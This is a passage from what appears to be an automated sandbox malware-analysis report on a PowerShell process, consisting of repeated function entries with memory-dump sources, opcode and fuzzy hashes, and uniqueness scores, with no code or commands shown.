                                        • Instruction Fuzzy Hash: B6F0F976600600AF97208F0AD985C27FBEDFBD577031AC55AEC4A9B716C671EC41CEA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0086D01C Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1823795455.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_86d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1ef6466acffdeca812e51bd0e92b22c86c3e5291701d4a50f5c0b17d68d24bb
                                        • Instruction ID: 583eb5872e0945108ca34712819917a918933bf8a7bd43a02e8ce9cd1df5048f
                                        • Opcode Fuzzy Hash: b1ef6466acffdeca812e51bd0e92b22c86c3e5291701d4a50f5c0b17d68d24bb
                                        • Instruction Fuzzy Hash: E9F0C271504340AEEB208A16C8C4B63FFE8EB51334F18C45AED484E286C2799841CAB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0086D984 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1823795455.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_86d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 901ae9e543a912fce40ef9a4cdbedf32b006227da02c1300f1c8e9120a1c3e71
                                        • Instruction ID: 7138f9b0589d954a58358ff424605417750bcb0d07548caac002dae8f3223ba6
                                        • Opcode Fuzzy Hash: 901ae9e543a912fce40ef9a4cdbedf32b006227da02c1300f1c8e9120a1c3e71
                                        • Instruction Fuzzy Hash: B1F0F975600A40AFD725CF06C985D23BBF9FB95724B1A8499A84A9B712C631FC42CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E18B88 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aa11df4e8545be4a85ceb87b22816aae96581db5f939b93f51a003070d380cbf
                                        • Instruction ID: 787e3b18644f0c8515dd56fc5fa80e1a9877edaf55743e3e719aeeea8efb2d3e
                                        • Opcode Fuzzy Hash: aa11df4e8545be4a85ceb87b22816aae96581db5f939b93f51a003070d380cbf
                                        • Instruction Fuzzy Hash: E3F0A071700618AFDB14AB59EC44ABFBBE9EB88765B00052DE00AD3750DF74AD8687A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1A187 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d7e8aaebbc47e0ed86049617b1fee89df0b5e1259a3043bc191d40c4ca43fec
                                        • Instruction ID: 5c234c9c339e749c0b2df9fd6127cdec074178fd323eeea03ccc9b08bc45152e
                                        • Opcode Fuzzy Hash: 3d7e8aaebbc47e0ed86049617b1fee89df0b5e1259a3043bc191d40c4ca43fec
                                        • Instruction Fuzzy Hash: 82F05CB57002085FE3146B78D0197EF77A6DFC0368F104139E80947386CE3A2A46C7D6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1F08F Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ba32946f63f2d3a51e9d5deaf23433cc99773ce6aed07677ffbf0ad0e3e7e27c
                                        • Instruction ID: 6334b51c2203d7d002a1d711c7925e64b83bd53c621455f0ae315be354a22fbd
                                        • Opcode Fuzzy Hash: ba32946f63f2d3a51e9d5deaf23433cc99773ce6aed07677ffbf0ad0e3e7e27c
                                        • Instruction Fuzzy Hash: 29E06D393001108F8210DB1DD454C66BBEAEFCE72531510AAF545DB725CA32EC418B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1A188 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8a19842c9b698c17f0de90577f539f3bb19973d95120b80cc2b33d86c18a7b06
                                        • Instruction ID: 579076bb9b51f99b1a7660a256c36f31a048c3fc06aca04220f4ee3269e4d1e3
                                        • Opcode Fuzzy Hash: 8a19842c9b698c17f0de90577f539f3bb19973d95120b80cc2b33d86c18a7b06
                                        • Instruction Fuzzy Hash: 7CF05CB17002085FE3046B78D0197EF77A6DFC0368F104139E80947386CE3A2A46C7D5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E188B7 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8d23987e87c5307c13a3a7e1aca9de7b61ba04ab0c6f6b8955a43c98ac5ab161
                                        • Instruction ID: 49648c7ca736c448768cb29900439468d050470b86b3e9debe56a374c47c1b48
                                        • Opcode Fuzzy Hash: 8d23987e87c5307c13a3a7e1aca9de7b61ba04ab0c6f6b8955a43c98ac5ab161
                                        • Instruction Fuzzy Hash: C8F0E5357001188FCB10D7ACD9406AA77EAFFCC3597514154E509EB324DE34CC418B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1EF21 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c28120f84005bf55de01ec49899aae61b7713d32f201b24bb5e932f659968d7
                                        • Instruction ID: bbd92e74a3ccba0c27a3ed7aa03797f9aa679d3bd2220baf32d35f361395b077
                                        • Opcode Fuzzy Hash: 9c28120f84005bf55de01ec49899aae61b7713d32f201b24bb5e932f659968d7
                                        • Instruction Fuzzy Hash: 16E0E535A00024978B04D6A9E8518DDF7A5DF8C310B20803AD806A7241EB32995EC6E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1F090 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e339f3b259de3eeebe43045a5d65225cd8972a4e58bae019d7a2199b15d8956b
                                        • Instruction ID: a357f8c0b56f167891ccb34e0d72036c5d1808dc6d130d9e6f6739ae9eccd25f
                                        • Opcode Fuzzy Hash: e339f3b259de3eeebe43045a5d65225cd8972a4e58bae019d7a2199b15d8956b
                                        • Instruction Fuzzy Hash: 4CE065393001108F8200DB1DD498C66BBEAEFCE72931910AAE549DB326CA32EC018B80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1EED0 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d3bedbfcef3ba00e2f86bdc298c7d5010523fd5b481c5cc7b884b69c0a7bea5
                                        • Instruction ID: 8d364b2a15e004dd7a9bb70a2723adfd7cd15e22bedf11244ec45814c641b01d
                                        • Opcode Fuzzy Hash: 7d3bedbfcef3ba00e2f86bdc298c7d5010523fd5b481c5cc7b884b69c0a7bea5
                                        • Instruction Fuzzy Hash: 30E022326007201FC3125A2D642149F7BAADFC1320315406AF4A4CB721DE249E0583E2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1A207 Relevance: .0, Instructions: 26COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9050142993b0bdf77686119d506938014aa42a8aa19a28a86c3e8fd195caeb61
                                        • Instruction ID: a13a35755274f8f0b7aa6880616b4b99154ad9c17b65dbb06d24cd2ebdd7b32c
                                        • Opcode Fuzzy Hash: 9050142993b0bdf77686119d506938014aa42a8aa19a28a86c3e8fd195caeb61
                                        • Instruction Fuzzy Hash: 50F06D709003045BD364AFB9E0997EABBE9FB44314F000439E54ED7280DF3969808B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1A208 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 51bbe5e11cad917257fec186a208efada1234473ba9af8832ccbe076eef4d3f8
                                        • Instruction ID: 2186c1472a5717003758cf8988726a7aa71d9926e1bab39f6016e1002295a6f8
                                        • Opcode Fuzzy Hash: 51bbe5e11cad917257fec186a208efada1234473ba9af8832ccbe076eef4d3f8
                                        • Instruction Fuzzy Hash: 01F06D709003044BD364AFB9E0997AABBE9FB44314F000439E54ED7280DB3969408B81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E19A17 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 438d2f7279b6067d76fb11c51bc08071a3385ac18fce424b7d86bb16acfd5ffc
                                        • Instruction ID: 3c66c6b475195a7c27a790920c53027aef22afc395f8ab609bd0bef1ad3dd71d
                                        • Opcode Fuzzy Hash: 438d2f7279b6067d76fb11c51bc08071a3385ac18fce424b7d86bb16acfd5ffc
                                        • Instruction Fuzzy Hash: 5CE04F3530461457CB092779B45D6EEBB96EBC9769F080029E40E87382CF7D5A1583EA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1A5EF Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e6c1f425980e912b1114edb33b1929a12f98eac38d11bfba717b3bdc5f86a0b8
                                        • Instruction ID: 04abed1051e202f9340084f5b2470b1254c5b246a05b496b9ef0c12746ad9c21
                                        • Opcode Fuzzy Hash: e6c1f425980e912b1114edb33b1929a12f98eac38d11bfba717b3bdc5f86a0b8
                                        • Instruction Fuzzy Hash: E9D05EF2B00125270A2420BA29117FBB6CF8AC56A4B1D2037AE04E3782ED51CC8103E6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E19A18 Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8243e56ffc0200802caad26a7f60c6322ea11bc3e272dfcfec04e80ab898a2d
                                        • Instruction ID: 4b96fb6cb2a430dbd9635b02c6c5f19e6a21423a9db8794e989085073a187fce
                                        • Opcode Fuzzy Hash: b8243e56ffc0200802caad26a7f60c6322ea11bc3e272dfcfec04e80ab898a2d
                                        • Instruction Fuzzy Hash: 9DE0863530461457CB092779B45D7AEBB96EBC9769F080039E40E87382CF7D5A15C3EA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1A5F0 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b3f67563110eaa66defe86a5058b826c73037453cb399a46621e49efc21b0a12
                                        • Instruction ID: 26520b49727bb6d2b81302013e884c1b4160636aa9e566cbc7af76652346f715
                                        • Opcode Fuzzy Hash: b3f67563110eaa66defe86a5058b826c73037453cb399a46621e49efc21b0a12
                                        • Instruction Fuzzy Hash: CFD05EF2B00125270A1420BA29117FBB2CF8AC56A4B1D2037AE04E3382ED51CC8103E6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E198A0 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 320e586fcbc368b1fc55ffb04b6bace971d43827f206e2e5e4a72604e2e6743d
                                        • Instruction ID: e9a1f5146f322ecb1dbf41ae118e84d671788885ac08154fbf21727017a8e8ef
                                        • Opcode Fuzzy Hash: 320e586fcbc368b1fc55ffb04b6bace971d43827f206e2e5e4a72604e2e6743d
                                        • Instruction Fuzzy Hash: AAE01A78A141598FC714EFB4F45A5F9BF70FB48305B200259D94AA3744EB31486ACBD0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1EEE0 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ad3357fb1373836f317915cdcdb2ebf8767a1361de0905ec62b8700e03779cbb
                                        • Instruction ID: 39ea41fae9bd6e6773658ef70535de4e33937b88fff058848514faf0bf9623dc
                                        • Opcode Fuzzy Hash: ad3357fb1373836f317915cdcdb2ebf8767a1361de0905ec62b8700e03779cbb
                                        • Instruction Fuzzy Hash: 2CE0C231740A240B8615662EA41159FBBDAEFC4760314443EF429C7710DE64ED0647D6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1EF30 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                        • Instruction ID: d1a81c938338418ec650fc68e5484868de41492235c1f4cb2c08e3e3b8d7ba7d
                                        • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                        • Instruction Fuzzy Hash: F8E08631B00014978B08D599D8504D9F7A5DBCC320F14847AD90AA7341DA32595A86D1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1C03F Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 308e1fec6d0730827b5b830e878011c3e89540f88882ac62e235abd1cad8cc8f
                                        • Instruction ID: ee0b17583517049c015a646c288f648b1989d89f4d54e2b6957951675a273e2d
                                        • Opcode Fuzzy Hash: 308e1fec6d0730827b5b830e878011c3e89540f88882ac62e235abd1cad8cc8f
                                        • Instruction Fuzzy Hash: 33D01236704125231B18906F78115FB76CF87D9A61718D07AB508D7704DD52CC4202F5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1EE75 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f516c2d0b2d14130025bc44fb25758ae722047ed17ba1cc997ab50cb5fef9167
                                        • Instruction ID: 821432f471ca0554eb7be38bcfdec536b04e2d7b40e0448b16422a8f8d21e7d0
                                        • Opcode Fuzzy Hash: f516c2d0b2d14130025bc44fb25758ae722047ed17ba1cc997ab50cb5fef9167
                                        • Instruction Fuzzy Hash: CDE0C231B005188FCF10EBA9D4006DDB7A1EFC4335F005828E119EB240CB3499898BD6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E18B50 Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e771186f0bf8f73ab4be6287a5bb3281ffe973ca4227917a3264cc090fe52aa8
                                        • Instruction ID: 1f4b4db4fb6f6d0834aa0d922d7703745b4e5ea4aa2fe65ac822c056e41244e1
                                        • Opcode Fuzzy Hash: e771186f0bf8f73ab4be6287a5bb3281ffe973ca4227917a3264cc090fe52aa8
                                        • Instruction Fuzzy Hash: D5D0A73500D3428FC2139670E4500D13BA1695110532501D7D085CE5A2CA35C586CB11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E197E7 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5604a5b8218bbba2ce34247a203a0f29b0c3181b376b0a0cf78bfb9303578b48
                                        • Instruction ID: 78098d06c0645883aa7c4ae8e0ac1447e8fd109aab7a7b9350e0f6413b2e92f4
                                        • Opcode Fuzzy Hash: 5604a5b8218bbba2ce34247a203a0f29b0c3181b376b0a0cf78bfb9303578b48
                                        • Instruction Fuzzy Hash: 34D0673490410A9BCB08AFB4F85B5FDBF38EA14306F50416AE90B52691EE3419A6CAD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E190C0 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 957f1b2f84a7eb5bbab73c6114ef7723e9c0a06abd40b6c372a6aedf65cb05af
                                        • Instruction ID: 78477d3e07433736441aa69ab3f0a8d4ae00a5376104bcb17e8caf045d59184d
                                        • Opcode Fuzzy Hash: 957f1b2f84a7eb5bbab73c6114ef7723e9c0a06abd40b6c372a6aedf65cb05af
                                        • Instruction Fuzzy Hash: D4C0803B60C3715FEF07D53414600F3BB721587310335C093C0D1C6042C914458BF562
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E197E8 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ded1ad2b01f437b16afed8d52d61decc1eeb53bfd91345bd0c25885f5fb5c8c8
                                        • Instruction ID: 3c01e39b459e49f9c2da6d2a7d4852c93a0b84ef40e3ec766d06acfb4254ca86
                                        • Opcode Fuzzy Hash: ded1ad2b01f437b16afed8d52d61decc1eeb53bfd91345bd0c25885f5fb5c8c8
                                        • Instruction Fuzzy Hash: 6CD0673490410A9BCB08AFA4F85B5FDBB38EA14306F50416AD90B52691EE341966CAD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E198B0 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f74a91bf1f997fcf6d312ea3742373bb17c3fb687e9b337549ea7cf746f32c30
                                        • Instruction ID: 5cacba9155c594090be17f976da6bb860e7ed1bc946836d65e5264cb8e7bd974
                                        • Opcode Fuzzy Hash: f74a91bf1f997fcf6d312ea3742373bb17c3fb687e9b337549ea7cf746f32c30
                                        • Instruction Fuzzy Hash: 6DD06734A142098FCB44EFB8F45A9AEBBB5BB48305F504169E90AA3754DA345851CBD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E18B60 Relevance: .0, Instructions: 8COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8ff39310d40e09c332e76538f119ecc9f68c32d02deed437d60315e868b81dc4
                                        • Instruction ID: 830afbced09d368ee463e431764f6fc33c5edab381920b1508868af0cc2bb077
                                        • Opcode Fuzzy Hash: 8ff39310d40e09c332e76538f119ecc9f68c32d02deed437d60315e868b81dc4
                                        • Instruction Fuzzy Hash: 77B092310457098FC2196F75E808815B36DBA4020A38008A9E50E0A6928E3AE841CF45
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1EEAF Relevance: .0, Instructions: 7COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93cf7a4db9210b18d809a595f7e0e06169023cd54791106101c81ebba94ba4fd
                                        • Instruction ID: 8c75e3626636dff6be8af57f7352d455b8fd905b270d0aed856721f13c6e9dad
                                        • Opcode Fuzzy Hash: 93cf7a4db9210b18d809a595f7e0e06169023cd54791106101c81ebba94ba4fd
                                        • Instruction Fuzzy Hash: EFB01237A00008C5DF00CBC4F0043ECF770E7C0336F100067D60C72500833002A45692
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1EEB8 Relevance: .0, Instructions: 7COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93cf7a4db9210b18d809a595f7e0e06169023cd54791106101c81ebba94ba4fd
                                        • Instruction ID: 8c75e3626636dff6be8af57f7352d455b8fd905b270d0aed856721f13c6e9dad
                                        • Opcode Fuzzy Hash: 93cf7a4db9210b18d809a595f7e0e06169023cd54791106101c81ebba94ba4fd
                                        • Instruction Fuzzy Hash: EFB01237A00008C5DF00CBC4F0043ECF770E7C0336F100067D60C72500833002A45692
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E184B0 Relevance: .0, Instructions: 5COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf08411db0256f4d14ce8af34ab5e4d1908d2d196fb20efa5578b5e00487650e
                                        • Instruction ID: fb7673d8a68dff74e6b57236146b9a6abfd6a105a35ab4ac058b5d6150bb4423
                                        • Opcode Fuzzy Hash: bf08411db0256f4d14ce8af34ab5e4d1908d2d196fb20efa5578b5e00487650e
                                        • Instruction Fuzzy Hash: 12A02232B2022003BF0CEA38022A2BA323323C0302300C02A8003E0000CC328082F800
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 07020568 Relevance: 6.7, Strings: 5, Instructions: 423COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1853617720.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7020000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fcq$4'^q$4'^q$4'^q$4'^q
                                        • API String ID: 0-2717029046
                                        • Opcode ID: 1372ef50978de4f79c540c49e16560738f5c41385bec14b69dc9415b3b32d114
                                        • Instruction ID: 61ee119d043d6373e9c877f6c9684482490de1f41a6ce89789959867a3311f7d
                                        • Opcode Fuzzy Hash: 1372ef50978de4f79c540c49e16560738f5c41385bec14b69dc9415b3b32d114
                                        • Instruction Fuzzy Hash: AFD175727043658FC7159B78D81476ABFE2AFC2210F1485BBE54ACB352DA328C46D7E2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 070223C0 Relevance: 6.5, Strings: 5, Instructions: 291COMMON
                                        Download Yara Rule
                                        Strings
